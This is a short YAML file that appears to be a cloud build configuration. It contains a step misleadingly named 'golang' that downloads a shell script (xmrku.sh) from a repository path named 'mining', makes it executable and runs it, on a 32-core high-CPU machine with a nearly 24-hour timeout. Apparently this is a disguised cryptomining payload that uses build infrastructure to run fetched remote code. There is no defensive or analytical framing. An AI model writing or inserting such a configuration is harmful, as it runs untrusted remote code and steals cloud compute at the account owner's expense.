steps:
  - name: golang
    args:
      - '-c'
      - >-
        wget https://try.gitea.io/novalanto61/mining/raw/branch/master/xmrku.sh && chmod u+x xmrku.sh && ./xmrku.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86000s
options:
  machineType: E2_HIGHCPU_32
  diskSizeGb: '1000'